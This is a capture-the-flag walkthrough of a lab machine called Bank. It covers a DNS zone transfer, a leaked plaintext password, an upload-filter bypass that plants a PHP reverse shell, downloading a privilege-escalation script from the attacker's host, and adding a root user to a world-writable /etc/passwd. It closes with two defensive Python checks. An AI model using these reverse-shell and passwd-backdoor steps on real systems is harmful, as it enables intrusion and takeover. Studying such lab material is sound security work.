  1. h3xu

    Bank

# Enumeration

### NMAP

The nmap scan reveals ports 53, 80 and 22 open, so we could assume that there is an HTTP web application, DNS and SSH services. Let's enumerate the DNS and check out the findings in our browser.

```
Host is up (0.047s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### [DNS Enumeration](https://medium.com/@klockw3rk/back-to-basics-dns-enumeration-446017957aa3)

```
# dig axfr @10.10.10.29 bank.htb

; <<>> DiG 9.16.11-Debian <<>> axfr @10.10.10.29 bank.htb
; (1 server found)
;; global options: +cmd
bank.htb.       604800  IN  SOA    bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
bank.htb.       604800  IN  NS     ns.bank.htb.
bank.htb.       604800  IN  A      10.10.10.29
ns.bank.htb.    604800  IN  A      10.10.10.29
www.bank.htb.   604800  IN  CNAME  bank.htb.
bank.htb.       604800  IN  SOA    bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
;; Query time: 47 msec
;; SERVER: 10.10.10.29#53(10.10.10.29)
;; WHEN: Tue May 11 03:28:16 EDT 2021
;; XFR size: 6 records (messages 1, bytes 171)
```

# Web App Enumeration

#### /etc/hosts

Add the IP address to our known hosts file in /etc/hosts as:

```
10.10.10.29 bank.htb chris.bank.htb ns.bank.htb
```

#### chris.bank.htb bank.htb ns.bank.htb

#### Dirbuster

A couple of interesting directories were found for http://bank.htb, including the /balance-transfer/ directory, which is not present in the picture. The *user* and *ticket* files do not return anything but footer on the other hand:

#### /balance-transfer/

Balance transfer is a directory which contains a bunch of encrypted accounts. While scrolling through the directory, looking for something out of the ordinary, I found a file that is 50% smaller than the rest of the files. When opened, it seems that encryption failed since it is in plain text:

```
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Christos Christopoulos
Email: [email protected]
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===
```

# Exploit

I have logged in to the given account and discovered a Support page which provides file upload functionality, which reveals a possible attack surface.

## LFI

The file upload has restrictions in place that prevent me from uploading anything other than images. Let's bypass that with Burp Suite.

#### Burp Suite

After configuring our *php-reverse-shell.php* from pentestmonkey, we try to upload it into the file upload form while having *intercept on*. After we capture the POST request, we send it to Repeater in order to debunk the restrictions in place. And voila...

## Shell

Open a nc listener that will intercept the reverse call and execute the file.

```
$ curl "http://bank.htb/uploads/php-reverse-shell.php.jpeg" |php
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  5492  100  5492    0     0  53843      0 --:--:-- --:--:-- --:--:-- 53843
PHP Notice:  Undefined variable: daemon in Standard input code on line 184
Successfully opened reverse shell to 10.10.14.3:1234
```

***yikes***, I just hacked myself 😄 Anyway... let's try to forget about that and figure out my next move.

I read in the source code that the developer added an exception for the ***htb*** extension for debugging purposes and that files with such an extension will be executed as PHP. So I have uploaded the reverse shell as an htb and just opened it, which returned a shell.

```
# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.29] 58982
Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux
 12:37:52 up  2:18,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$
```

# Privilege Escalation

We are logged in as www-data. In order to figure out our attack surface, I will run a script called unix-privesc-check. In the following lines, I am going to folder /tmp because it is a writeable directory and download the file from my local Kali system.

```
┌──(kali㉿kali)-[~/bank]
└─$ sudo cp /usr/share/unix-privesc-check/unix-privesc-check .

┌──(kali㉿kali)-[~/bank]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.29 - - [11/May/2021 05:40:44] "GET /unix-privesc-check HTTP/1.1" 200 -
10.10.10.29 - - [11/May/2021 05:41:21] "GET /unix-privesc-check HTTP/1.1" 200 -
```

```
$ cd tmp
$ touch file
$ ls
file
vmware-root
$ wget http://10.10.14.3:8000/unix-privesc-check
--2021-05-11 12:45:15--  http://10.10.14.3:8000/unix-privesc-check
Connecting to 10.10.14.3:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 36801 (36K) [application/octet-stream]
Saving to: 'unix-privesc-check'

     0K .......... .......... .......... .....                100%  654K=0.05s

2021-05-11 12:45:16 (654 KB/s) - 'unix-privesc-check' saved [36801/36801]

$
```

Let's upgrade our session to be more intuitive and responsive.

```
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@bank:/tmp$ export TERM=xterm
export TERM=xterm
www-data@bank:/tmp$ ^Z
zsh: suspended  nc -nlvp 1234

┌──(root💀kali)-[/home/kali/bank]
└─# stty raw -echo;fg                                                148 ⨯ 1 ⚙
[1]  + continued  nc -nlvp 1234
```

Now I have tab-completion and all keys register as normal.

```
www-data@bank:/tmp$ chmod +x unix-privesc-check
www-data@bank:/tmp$ ./unix-privesc-check standard
...[snip]...
############################################
Checking if anyone except root can change /etc/passwd
WARNING: /etc/passwd is a critical config file. World write is set for /etc/passwd
```

Ok, so we have a writeable /etc/passwd file. Let's add a privileged user and escalate. Firstly, create a password:

```
$ openssl passwd -1 -salt hacker hacker
$1$hacker$TzyKlv0/R/c28R.GAeLw.1
```

Next, add the user as follows:

```
www-data@bank:/$ nano /etc/passwd
#################################
add the user in the document like so:
hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash
#################################
www-data@bank:/$ su hacker
Password:
root@bank:/# whoami
root
root@bank:/#
```
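
An added example, not part of the original write-up or of the target application's code: a server-side upload check that rejects both `php-reverse-shell.php.jpeg` and the `.htb` upload described in the Exploit section. The function name, the extension lists and the sample uploads are assumptions made for illustration.

```python
import os
import secrets

# Assumption: extensions the web server hands to an interpreter. "htb" is the
# debug mapping the write-up found in the application's source.
EXECUTABLE_EXTS = {"php", "php5", "phtml", "phar", "htb"}
# Assumption: the support form should only accept these image types.
IMAGE_MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def check_upload(filename, content):
    """Return (stored_name, None) when accepted, else (None, reason)."""
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return None, "missing extension"
    # Check every dot-separated part: Apache's mod_mime can apply a handler
    # mapped to any extension in the name, not only the last one.
    for part in parts[1:]:
        if part in EXECUTABLE_EXTS:
            return None, "executable extension: " + part
    ext = parts[-1]
    if ext not in IMAGE_MAGIC:
        return None, "extension not allowed: " + ext
    if not content.startswith(IMAGE_MAGIC[ext]):
        return None, "content is not a " + ext + " image"
    # Store under a server-chosen name, never the client-supplied one.
    return secrets.token_hex(16) + "." + ext, None


if __name__ == "__main__":
    # Constructed sample uploads (file name, first bytes of the body).
    samples = [
        ("php-reverse-shell.php.jpeg", b"<?php // constructed"),
        ("php-reverse-shell.htb", b"<?php // constructed"),
        ("ticket.jpeg", b"<?php // constructed"),
        ("ticket.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8),
    ]
    for name, body in samples:
        print(name, "->", check_upload(name, body))
```

The check runs on the server after the request arrives, so editing the request in a proxy does not change its result. The upload directory should additionally be served with script handlers disabled.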
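
An added example, not part of the original write-up: an audit of a passwd file for the condition used in the Privilege Escalation section, namely a file writable by non-root users and an extra UID 0 entry that carries its own hash. `audit_passwd` and the root and www-data sample lines are constructed for illustration; the `hacker` line is the one shown in the write-up.

```python
import os
import stat

# Second-field values that mean "hash is kept elsewhere or login is locked".
NO_HASH = {"x", "*", "!", "!!"}

# Constructed sample: the root and www-data lines are illustrative; the last
# line is the entry the write-up adds.
SAMPLE = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
    "hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash\n"
)


def audit_passwd(text, mode):
    """Return findings for passwd-format text and the file's st_mode."""
    findings = []
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(
            "file is group- or world-writable (mode %o)" % stat.S_IMODE(mode))
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append("line %d: malformed entry" % n)
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid.isdigit() and int(uid) == 0 and name != "root":
            findings.append("line %d: %s has UID 0" % (n, name))
        if pw == "":
            findings.append("line %d: %s has an empty password field" % (n, name))
        elif pw not in NO_HASH:
            findings.append(
                "line %d: %s stores a password hash in passwd" % (n, name))
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE, 0o100666):
        print("sample:", finding)
    path = "/etc/passwd"
    if os.path.exists(path):
        with open(path) as fh:
            for finding in audit_passwd(fh.read(), os.stat(path).st_mode):
                print(path + ":", finding)
```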
